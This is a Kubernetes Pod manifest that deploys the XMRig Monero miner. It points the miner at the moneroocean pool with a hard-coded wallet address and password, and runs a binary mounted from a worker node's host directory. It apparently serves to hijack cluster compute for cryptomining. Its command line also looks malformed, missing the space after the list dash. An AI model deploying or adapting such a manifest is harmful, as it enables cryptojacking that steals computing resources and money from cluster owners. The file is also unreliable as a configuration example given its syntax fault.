apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec
spec:
  containers:
  - name: xmrig-container
    image: busybox
    command:
    -./xmrig -o gulf.moneroocean.stream:80 -u 87T57vEfgmKevdUuXwsjZGYpZ8FUR5LuuZA8BGG9sQ91hUbaqRh7HywdxhKQcqvqbsaPuZktbBzPy5cwPpXtJh275TpS7U5 -p piD3ceiver
    volumeMounts:
    - name: xmrig-volume
      mountPath: /home/worker2/xmrig/build/
  volumes:
  - name: xmrig-volume
    hostPath:
      path: /home/worker2/xmrig/build/
